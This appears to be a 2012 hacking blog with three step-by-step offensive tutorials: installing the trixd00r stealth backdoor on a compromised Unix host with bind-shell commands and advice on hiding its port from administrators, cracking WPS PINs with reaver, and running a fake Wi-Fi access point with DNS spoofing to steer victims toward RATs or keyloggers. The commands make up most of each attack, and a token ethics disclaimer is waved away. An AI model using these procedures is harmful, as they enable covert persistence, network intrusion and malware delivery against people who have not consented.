Feeding you Hacks

Wednesday, 10 October 2012

Books to get you going as a Pentester I thought I would contribute a few books that I have read that got me really interested in penetration testing so here you go,
I'm sure there are many other great books but these are the ones I liked.
I hope everyone enjoys these books as much as I did.

Trixd00r is a great little tool from the guys over at nullsecurity
that is a very stealth backdoor on any *nix system. It's got a server
and a client so obviously to use this you would already have access to
the box, but you need to come back later or something so trixd00r is
perfect for that.
Also, to run the server on the compromised machine you will need to
either be root, or w/e user you are to be in the sudoers file and know
their password.

Alright moving on, go ahead and grab the tar file...

Code:

wget http://www.nullsecurity.net/tools/backdoor/trixd00r-0.0.1.tar.gz

Untar it...

Code:

tar -zxvf trixd00r-0.0.1.tar.gz

Go to the newly created directory...

Code:

cd trixd00r-0.0.1

Okay so now we will type the command make to get some output for the installation directions, and you will get the following:

Okay so as you can see it gives us the option to install on quite a few different OS's, in this case I will choose Linux.

Code:

make linux

Alright so it should spit some stuff on your screen and when you do an ls command you should have some new goodies in the directory.

Note*
If you are using this on OS X, choose linux...you will need to have the command line utils installed though, just go to github
and get the prepackaged gcc installer if you don't have time or don't
want to download Xcode, otherwise you get an error about no gmake/make
being present.
Oh and if linux complains about no gmake too, just make a symbolic link between make and gmake. ln -s /usr/bin/make /usr/bin/gmake

The great thing about trixd00r is that the
server (compromised machine) listens invisibly for "magic packets" sent
from the client (attacker) and when it gets those packets it will
either bind a shell on a tcp/udp port of our choosing or connect back to
us again using either protocols.

Good job, we have the server (trixd00rd) and the client (trixd00r) ready for use. Now to the fun stuff!

Now we need to set up our trixd00rd on the compromised machine, to do that we run sudo ./trixd00rd -H to get a list of options.

Note*
A really cool feature is you just put a ? after the option to see it needs.

So first off the -i flag is for the interface connected to the web that we'll be using...pretty self explanatory.

And sudo ./trixd00rd -i en1 -t ? would get me...

The default is the TCP SYN packet which
I'm just going to leave it...the other protocols are the same process as
this one, I'll leave it up to you to play with them and discover why
one would be more advantageous than the others, situational dependent.
If you don't know the different protocols and how they work, I recommend
reading up on them due to the fact that they're just good to know. Not
understanding even basic tcp/ip (i'm no expert) is just ignorant,
especially when it's fun to learn about, and hacking/pentesting and
information security has so much do with it.

The -s flag is which shell mode we want to use, again I used a ? to see the different options...in this case we are using the TCP Bind option, which will be -s 0

Alright the two options above (-t and -s) are the most important, so I will show you the rest of the options I used, a picture and then explain them below.

sudo ./trixd00rd -i en1 -t 0 -s 0 -b <port> -v

-b 2302 This
is the port that our listener will be bound to, waiting for the magic
packet to give us our shell. The default is 31337, which comes up as
"Elite" on a port scan, so if the admin, or user or whoever runs a scan
because he's security minded he will see that port open which is known
to be a trojan/backdoor/RAT/etc so I always change my backdoor ports to
shit that is a game app or some obscure port that has nothing to with
any of the above - out of sight, out of mind.
^^^The only time this will come up on a port scan is when you are
actually interacting with trixd00rd, any other time and it will just
show up as closed, or filtered to an outsider - that's why this is so
stealthy!

-vThe
-v option is for verbosity, I like to see output to know what is going
on and if something goes wrong it will say in plain english.

Our server is waiting for the magic packets, so now we go to our client and interact with the shell!

./trixd00r -h <target IP> -t 0 -s 0 -p <port> -m <passphrase> -v

-h 192.168.1.3 This tells trixd00r where to send the packet to get our shell.

-t 0 and -s 0 have to match up with trixd00rd - for obvious reasons.

-p 2302 This tells trixd00r which port the server is listening on.

-v Again, verbosity.

And we're done. If all went well, you'll get a nice welcome banner like the one below, and a prompt waiting for input!

To COMPLETELY close the connection we use control+C on the client and then add -m byebye
and hit enter, it will tell you that it sent the magic packet which
means the connection was closed and now the server is NOT listening
anymore.

Server side if you send the byebye packet it will look like this...

To keep the server listening on the compromised machine so you can come back later, just hit control+C on the client but do not send the byebye packet.

I have been studying for this certification exam and this book has been
very useful. This isn't a one stop shop to this exam. They encourage
you to learn more than what this book teaches, but I wanted to share
this with anyone who wants to study for the exam or just read some
useful information.

Tuesday, 2 October 2012

HISTORY LESSON
WPS (Wifi Protected Setup) is a feature created in 2007 to make Wifi
Protected Networking easy for the average user while making it secure.
However due to a design flaw in the authentication for the PIN for the
device, this has allowed the ability to Crack the PIN on a WPS enabled
AP. This has nothing to do with cracking the WPA/WPA2 PSK, although it
will be obtained with this method.

The PIN is broken down as 11112223 (Example for explanation only and not to be taken literally)
The 1111 is the first half of the PIN. The 222 is the second half of
the PIN. The 3 is a checksum of the entire PIN (first 7 digits).
Reaver must first obtain the first half of the PIN (1111) before it can
go on to the second half (222). When reaver is running you will notice
1111 changes 222 remains same and 3 changes, until it obtains the first
half of the PIN. Then the 1111 remains same, 222 and 3 changes as it
obtains the second half of the PIN.

With Backtrack Running download Reaver
extract and install reaver as follows from Terminal:
tar xvfz reaver1.xxxx (xxxx being the release number which will change with updates)
cd reaver1.xxx
cd /src/
./configure
make
make install

Assuming no errors lets continue
Open a fresh terminal and let get the adapter running in promiscuous mode and type the following

airmon-ng (this will list your wifi adapters, most common is wlan0)
airmon-ng start wlan0 (replace wlan0 with the one you get listed)
you should receive output that tells you which Interface is in Monitor Mode. Most commonly mon0

Now in the same terminal lets see who is around and type the following:
airodump-ng --encrypt wpa mon0 (this will display only WPA/WPA2
encrypted networks. Let it run for 30 sec or so till you see all AP's
that you can. Hit CTRL+C

AP's should be listed by power so you want to start with the top ones
and work your way down the list. But wait.. how do I know if WPS is
enabled. Glad you asked.

Open a new terminal and type the following:
walsh -i mon0 (replace mon0 as noted above. This will scan for all WPS
enabled AP's in range and remove the guess work and compare it to the
airodump-ng output and pick out the highest powered AP first.)

Now we are ready to start. Go back to the Terminal that you installed reaver with and type the following:

reaver -i mon0 -b BSSID -S -vv (Change mon0 as noted previously. BSSID
is the MAC address of the AP. You can use the MAC from the walsh
output or the airodump-ng output as they will be the same. The -S
switch reduces the packet size sent to the AP and thereby decreases the
attack time. The -vv switch will display all errors and PIN's tested.)

Now just let it run.

THINGS TO NOTE:
You may see the percentage in reaver output go from 2% to 90% just like
that. This is normal when it finds the first half of the PIN. This is
also why you will notice the second half of the PIN as noted above as
222 remains constant before it finds the first half.

Errors are a common thing to see and caused by many variables.
WARNING: Receive timeout occurred
WARNING: 10 failed connections in a row
WARNING: Out of order packet received, re-trasmitting last message
Just let it run.

Tired
of cracking WEP? Tired of WPA and countless hours of dictionary
attacks? Then it's time to be sexy. YOU need to be sexy. And I'll show
you how.

Here's the deal: how would you like to create a fake access point named,
say Wifi Hotspot, and have people connect to YOU. From there, you can
mess around with them, DNS spoof them to websites, or even your own web
server convincing them to download your RAT/keylogger. Or how about
monitoring all their websites and network traffic? I won't show you all
of this, but I'll show you some.

First off, I would like to give a huge shoutout to member proxx8187.
He helped me a great deal diagnosing problems in the making of this
tutorial. Some of you may recognize him as the encyclopedia giving
answers to all of your incessant questions ;) Another big shoutout goes
to SpyFi.
He inspired me to pursue this area and thus the creation of this
tutorial. Some may recognize him as the genius behind many great
tutorials all around HF, as well as his Android hacking threads. Another
member who helped to diagnose problems was GeeMann.
He's amazing and one of the highest quality users I've seen around the
HF wireless section. In case you didn't know, he's the mastermind behind
our WPS cracking tutorial. I also would like to thank CapitalS
for helping me out too in the creation of this tutorial. This was made
mostly by me, but would have been impossible without the help of these
four great members!

Now the tutorial!! This is for educational purposes only. Please stay
ethical with this and always get permission before you do something. I
know you will ignore my plea for righteousness, but really, stay
ethical. It will pay off in the long term! Now, let me give a brief
overview of what we are going to accomplish here. We will create a fake
access point with whatever name you like, and provide any person that
connects to it with internet access, so they will think they are on a
legitimate access point! Then from there, we can do many things do the
client.

TABLE OF CONTENTS:

WHAT WE NEED

STEP ONE: GETTING THE DHCP3 SERVER

STEP TWO: CONFIGURING THE DHCP3 SERVER

STEP THREE: SETTING UP THE FAKE ACCESS POINT AND RUNNING THE DHCP3 SERVER

STEP FOUR: SETTING UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS

STEP FIVE: SCREWING WITH PEOPLE

WHAT WE NEED:1.
Two wireless interfaces. (An external USB wifi adapter, plus your
internal wifi laptop adapter) A good external wifi adapter is the ALFA
AWUS036H. It's the one I use. You can get one for about 25 dollars on
Amazon.
2. Backtrack 5 R2 (R1 should work, but this was tested on R2)
3. A brain please.

STEP ONE: GETTING THE DHCP3 SERVER

We need to update Backtrack and then install the dhcp3 server.

Code:

apt-get update && apt-get upgrade && apt-get dist-upgrade

Code:

apt-get install dhcp3-server

Cool
we got all the stuff we need! We are ready to begin our attack. Please
make sure that your laptop interface (should be wlan0) is connected to
your own router. Make sure that your external interface is plugged in
and ready to go (this one should be wlan1).

STEP TWO: CONFIGURING THE DHCP3 SERVER

We
must begin the process of configuring our dhcp3 server so that our
clients will receive an IP address when they connect. I expect your
laptop interface to be connected to your router right now, and the
external interface plugged in but not connected to any router, so we
will run a check to determine our DNS address.

Code:

cat /etc/resolv.conf

See
that IP address printed after "nameserver"? That's the DNS address.
Please take note of it. In the soon following code, we will replace $dns
with the DNS address you saw in the previous command.

Code:

gedit /etc/dhcp3/dhcpd.conf

If you are using Backtrack 5 KDE version, type this instead:

Code:

kwrite /etc/dhcp3/dhcpd.conf

If kwrite doesn't work, replace it with kate.

Now we have a text editor open with some text in it. Delete everything you see, and replace it with this:

Remember to replace $dns with your DNS address you learned earlier!!! So a possible line will look like this:

Code:

option domain-name-servers 192.168.0.1;

STEP THREE: SET UP THE FAKE ACCESS POINT AND RUN THE DHCP3 SERVER

Let's
configure our wireless interfaces shall we? We need to put our external
interface into monitor mode. If you don't know the names of your
interfaces, type "ifconfig" without quotes, and it will show you. In my
situation, the external interface is wlan1, so just replace that with
YOUR external interface.

Code:

airmon-ng start wlan1

Code:

airbase-ng -e "NAME OF ACCESS POINT HERE" -c 9 mon0

Now
open a new terminal and type the following code which will set up our
fake access point along with the dhcp3 server. Be sure to enter each
command separately.

You
should now have two terminals running. One with airbase-ng maintaining
your fake access point, and another with the dhcp3 server open. We now
need to set up our iptables to let our clients gain internet access.

STEP FOUR: SET UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS

Your
laptop interface should be connected to your router!! I am assuming your
laptop interface is wlan0, but if not, type ifconfig to see which one
it is. If you don't know what it is, you should close out of this
tutorial. There are some variables in this next code you will need to
replace yourself. I will tell you how and which.

We need to find your gateway address. Type the following into a new terminal:

Code:

route | grep "default"

See
that IP address next to "default"? That is your gateway IP address, and
you should take note of it. It should, in most cases, be the same as
your DNS address. Remember your laptop interface? It should be wlan0, if
not, you should know what it is. In the following code, replace
$interface with your laptop interface, and $gateway with your gateway IP
address. Be sure to enter each command separately (yes a lot of copy
and pasting).

Congratulations!!!
You have set up a fake access point with WORKING internet connection.
Go ahead, give it a try using another computer and connect to your
access point!

STEP FIVE: SCREWING WITH PEOPLE

Now
that our client(s) is connected to YOU, you can do whatever you want to
them! One of my favorites is the use of DNS spoofing. While your clients
are connected to you, you can redirect whatever website they visit to
whatever website you want them to go. Or, even better, you can redirect
them to your own web server on your computer that could convince them to
download a RAT or keylogger.

I will show you how to perform a simple DNS spoofing attack on your
client. Create a file in your ROOT folder named spoof. Enter the
following text into that file.

Code:

192.168.2.129 *

Now
we initiate the DNS spoofing attack. This will redirect every website
our client visits to YOU. So if you are running your own web server on
your computer, they will be redirected to that web server. This is great
for Java Applet attacks and other Social Engineering Toolkit stuff! Use
the search option at the top of this website to find out more.

Code:

dnsspoof -i at0 -f /root/spoof

There,
now every website they will visit will be redirected back to your own
web server! Note, if you want this attack to be more flexible, edit the
spoof file you created earlier. 192.168.2.129
is the IP address you want to redirect them to. The parameter after
that is the website you want to be redirected. For example, if I want to
redirect my client's requests for google.com to yahoo.com, I would
enter the following in my spoof file.

Code:

98.139.183.24 google.com

Here, 98.139.183.24 is the IP address of yahoo.com. You can find the IP address of websites by pinging them in the terminal.

Code:

ping yahoo.com

This
is the end of my tutorial. I hope you found it informative, as well as a
fresh new way of performing wireless attacks. There are myriad ways you
can leverage this attack to perform all sorts of man-in-the-middle
attacks, but I leave that up to you to research. I did the hard part for
you, so now it's up to you to figure out the rest! Please say thanks!